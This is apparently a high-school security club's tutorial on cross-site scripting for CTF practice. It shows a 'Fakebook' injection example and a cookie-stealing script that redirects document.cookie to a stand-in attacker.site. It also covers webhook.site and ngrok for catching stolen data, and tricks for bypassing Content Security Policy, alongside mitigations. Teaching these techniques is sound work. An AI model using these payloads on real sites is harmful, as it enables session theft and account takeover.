XSS - HackMD

# XSS ## Club Resources * [Practice Problems](https://ctf.tjcsec.club) * [Codespaces Desktop](https://github.com/dianalin2/desktop) * [Shell Commands List](https://hackmd.io/@tjcsc/cmd) ## What is XSS? When you post on Facebook, the server saves your post. It then displays your post to tons of other users. What could happen when Facebook doesn't correctly filter (or *sanitize*) your data before your post is displayed to another user? Well, a post is just a piece of data that is embedded in the server's HTML response to your request. Take this response for a Fakebook post, for example: ```htmlmixed <!DOCTYPE HTML> <html> <head> <title>Fakebook</title>  </head> <body> <div> hey tj!!! join csc pls </div>  </body> </html> ``` This HTML is rendered on your browser to look like the following page: ![Webpage](https://hackmd.io/_uploads/HypDvaoH6.png) In this case, we made a post that says `hey tj!!! join csc pls`. We should note, however, that we can put whatever we want as our post content. We could make a malicious post that says: ```htmlmixed <script> alert('hello there!!!'); </script> ``` This would make the post's web page look like: ```htmlmixed <!DOCTYPE HTML> <html> <head> <title>Fakebook</title>  </head> <body> <div> <script> alert('hello there!!!'); </script> </div>  </body> </html> ``` The `<script>` tag tells the page that its inner content is a script (written with [JavaScript](https://www.javascript.com/)). That means that we can run any arbitrary script. The payload (i.e. our input) above generates the following alert box: ![Alert Box](https://hackmd.io/_uploads/HkBp8TiHp.png) This is a major security vulnerability. If anyone else could post arbitrary Javascript that runs whenever you view the post, they could steal a bunch of user data. **Cross-site scripting (XSS)** is the formal name for an attack that injects a script to attack another client. With XSS, you are (almost) never trying to attack the server, but, instead, trying to steal data from another user. ### What data are we trying to steal? It turns out that Javascript is pretty powerful. It has access to a lot of things, including the DOM[^1] and a user's cookies. Cookies generally store a user's **session data**, among other pieces of data. As you may recall, cookies are sent to the server each time a request is made, so that makes it the perfect tool for a server to use to track who you are. This is oftentimes not malicious—perfectly well-meaning websites will store a unique identifier cookie to make sure that you are logged in as a specific user. Because cookies store session data, a malicious attacker can steal a user's cookies to impersonate them. Anyone can access a user's cookies in Javascript with `document.cookie`. ### How do we steal this data? How do attackers *steal* data and see it for themselves? Our being able to access `document.cookie` in a script does not mean that an attacker can read the exact value of `document.cookie` themself. Instead, they must send the value back to themself. Attackers generally do this by making a request to an attacker-controlled website with the data attached. We can make a request to an attacker-controlled site in various ways: * `document.location` is the URL of the website that is displayed. * `fetch(URL)` lets us make a request to another website in the background. If an attacker injects a script to connect to an attacker-controlled site with the stolen data as a query parameter, the attacker can inspect that request to see what exactly was sent to their server. Assuming that the attacker controls [http://attacker.site](), an example script would look like the following: ```js document.location = "http://attacker.site/?cookie=" + document.cookie; ``` Let's put this all together to steal someone's Fakebook session data. We can make a post with the following content:[^2] ```htmlmixed <script> document.location = "http://attacker.site/?cookie=" + document.cookie; </script> ``` When someone views that post, they will automatically be redirected to `http://attacker.site/?cookie=session=their-session-id`. The attacker can then view that someone made this request in their website inspection window: ![image](https://hackmd.io/_uploads/B1wbPAiBa.png) Success! We just stole our first cookie! #### webhook.site If we don't have a web server at hand, we can remedy that with [webhook.site](https://webhook.site/). webhook.site gives us a "webhook" to send data back to. We are able to inspect all HTTP requests sent to our personalized URL on this website, so we can attach data to our requests and see exactly what data is attached from the webhook side. First, open webhook.site in your browser. You will be redirected to your personalized URL. Copy your unique URL and connect to it in another tab. You should now be able to see that a new GET request was made. Now, connect to: ``` <your-personalized-url>?a=flag ``` You should be able to see this query string in the main webhook.site page: ![image](https://hackmd.io/_uploads/S1hUqQzrT.png) ### Admin Bot While the end goal of XSS is usually to steal another user's data, it turns out that it is super annoying to check that you have solved the challenge by manually going to your Fakebook post and letting you steal my data. Instead, we have a robot to do that for us! Our "admin bot" is a [Puppeteer](https://pptr.dev/) instance. Puppeteer is based off of Chromium, which is a bit like open-source Google Chrome, so it runs a web browser just like you and me! The catch is that the bot will do the same exact thing every time, which ensures that it does not screw up when testing your solution. The manner in which the bot opens the page and interacts with it is specified by an `admin-bot.js` file. Let's take a look at a sample file now: ```js import flag from './flag.txt'; function sleep(time) { return new Promise(resolve => { setTimeout(resolve, time) }); } export default { id: 'my-challenge', name: 'my-challenge', urlRegex: /^https:\/\/my-challenge\.challenge\.tjcsec.club\//, timeout: 10000, handler: async (url, ctx) => { const page = await ctx.newPage(); // for the site specified, set the bot's cookie to be the flag await page.setCookie({ name: 'flag', value: flag, url }); // navigate to the site await page.goto(url, { timeout: 3000, waitUntil: 'domcontentloaded' }); // wait for the page to load await sleep(5000); } }; ``` We have a couple fields that are exported. Let's go through what each of them means: * `id` is the ID of the challenge. You, as a competitor, can mostly ignore this. * `name` is the name of the challenge that is displayed on the submission site. You, again, can ignore this. * `urlRegex` is the format in which URLs can be submitted. It uses a [regex](https://en.wikipedia.org/wiki/Regular_expression) to pattern match, but you don't need to know the in-depth workings of regexes for our purposes. That's an entire AI unit. You just be able to recognize that the above expression says that you can submit any page located at https://my-challenge.challenge.tjcsec.club. If no `urlRegex` is specified, the bot is able to access any website. * `timeout` is the time (in milliseconds) that the browser window is open for. After this time period, the window closes even if the bot is still interacting with the page. * `handler` is the manner in which the bot interacts with the page. This function takes in the submitted URL and a browser context and interacts with the page in the manner specified, line by line. Trying to read the admin bot configuration should not be part of the challenge—this part is not applicable in real life. It's perfectly alright if you don't know what a configuration does and, if you have any issue with reading an admin bot configuration, feel free to open a ticket or DM an officer. ## Mitigations The best and most obvious way to prevent XSS is to properly sanitize data. Servers can do this by replacing possibly dangerous characters with their respective [HTML entities](https://www.w3schools.com/html/html_entities.asp), which will disallow malicious users from making `<script>` tags. Additionally, using `node.innerText` instead of `node.innerHTML` when displaying user data is often safer because HTML cannot be rendered. There are also several other mitigations to protect user data if something falls through the cracks. ### HttpOnly Cookies Cookies can be specified as `HttpOnly` to make them invisible when accessing cookies via `document.cookie`. This makes cookies a little less useful because they cannot be accessed through JavaScript, but, for some applications, this is enough. ### Content Security Policy Content security policy (CSP) is an HTTP header or meta tag that is sent with a response that is designed to mitigate XSS. It doesn't stop injections from happening, so it should not be used as a first line of defense. Instead, it minimizes the damage that an injection could do by limiting what scripts are able to do. An example of CSP specified through an HTTP header is shown below: ``` Content-Security-Policy: default-src 'self'; img-src *; script-src example.org ``` An example of CSP specified through a meta tag is shown below: ```htmlmixed <meta http-equiv="Content-Security-Policy" content="default-src 'self'; img-src *; script-src example.org" /> ``` The two above CSPs do the exact same thing, but they are specified two different ways. The next question, now, is what do they both do? CSPs consist of many policy directives that the browser should consider when trying to access a certain resource type. These resources can be scripts, stylesheets, and other websites. These policies are separated by semicolons, so `default-src 'self'`, `img-src *`, and `script-src example.org` are three different policies. These policies have two parts: the directive and source value. Common directives are listed below, but there are [many more](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/Sources): * `default-src` - Default property used as a fallback if it is not specified * `script-src` - Valid sources for JavaScript * `connect-src` - Valid URLs for the client to connect to * `img-src` - Valid sources for images * `style-src` - Valid sources for stylesheets * `object-src` - Valid sources for plugins (usually set to 'none') Source values specify exactly where the resource is allowed to be from. Common ones are listed below, but, yet again, there are [many more](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/Sources): * `<host-source>` (e.g. `https://*.example.com`) means that the resource can be found anywhere on the specified site. * characters are wildcards, meaning all values are valid. * `'unsafe-inline'` means that resources (e.g. scripts, stylesheets) can be specified inline, meaning they can be specified within the body of the `<script></script>` or `<style></style>` tags. * `'self'` means that the resource can be found at the same *origin* (domain/IP address and port number) as the current site. This resource cannot be inline but, instead, must be specified at another path like `<script src="/my-script.js"></script>`. * `'none'` means that no resource of the specified type is allowed. * `'nonce-<value>'` (e.g. `'nonce-324fe1a4bc'`) means that resources that specify the nonce as a tag attribute (e.g. `<script nonce="nonce-xxxx"></script>`) are allowed. This nonce value should only be used once and should not be predictable by anyone. #### CSP Bypass There isn't a 100% surefire way to bypass any CSP because they are intended to make sites more secure. However, I do have a couple tricks for specific cases. If `connect-src` is restricted, the only thing that is restricted is making sub-requests to other servers (i.e. requests made in the background). This means that `fetch` may be restricted, but changing the document location does not make a background request. Instead, it changes what website you are connected to. This means that you can generally use `document.location` to bypass `connect-src`. If particular source values are restricted to `'self'`, you can try to find a way to host raw user data on the website. For example, does the site allow uploads? If uploads are accessible, you can upload a script and refer to it like so in your injection: `<script src="/uploads/my-upload"></script>`. For other cases, you may need to host your own web server to serve files from. If this is the case, ngrok is a very useful tool. ##### ngrok Ngrok is a *reverse proxy* that allows us to make a publicly accessible website very quickly and easily. We are able to forward any HTTP servers that we have on our computer to any computer on the web. That means we can publicly host files that we want to be accessible to other people. To install ngrok, run the following command: ```bash curl -s https://ngrok-agent.s3.amazonaws.com/ngrok.asc | \ sudo tee /etc/apt/trusted.gpg.d/ngrok.asc >/dev/null && \ echo "deb https://ngrok-agent.s3.amazonaws.com buster main" | \ sudo tee /etc/apt/sources.list.d/ngrok.list && \ sudo apt update && sudo apt install ngrok ``` You can run a simple HTTP server using Python. In a bash terminal, run: ```bash python3 -m http.server 5000 ``` This starts an HTTP server that you can access on port 5000. You can connect to this server at http://localhost:5000 or http://127.0.0.1:5000 **on the same computer that is running the server**. To make this HTTP server publicly accessible, we can run the following command in a different terminal: ```bash ngrok http 5000 ``` We should now be able to access this website on the URL that ngrok specifies, which should be in the form `<random-string>.<random-string>.ngrok-cname.com`. ## Conclusions XSS is hard to completely account for and even large websites like [GitHub](https://robertchen.cc/blog/2021/04/03/github-pages-xss) may not be completely fortified. It's a difficult topic to wrap your mind across, however, so if you have any questions, feel free to contact us by: - Asking for help during a club block - Creating a ticket on our [Discord server](https://tjcsec.club/discord) - DMing an officer Happy hacking! [^1]: The Document Object Model, or DOM, is the "tree" structure in which HTML is represented. Whenever the browser responds with HTML, that HTML is parsed and converted into a "tree" with nodes (i.e. `div`s, `script`s, `body`s,) nested under other nodes. Having access to the DOM means that an attacker can see the exact layout of your page, including any sensitive info that is displayed. [^2]: I added nice spacing to make the injection look prettier, but it would work just as well as `<script>document.location="http://attacker.site/?cookie="+document.cookie</script>`.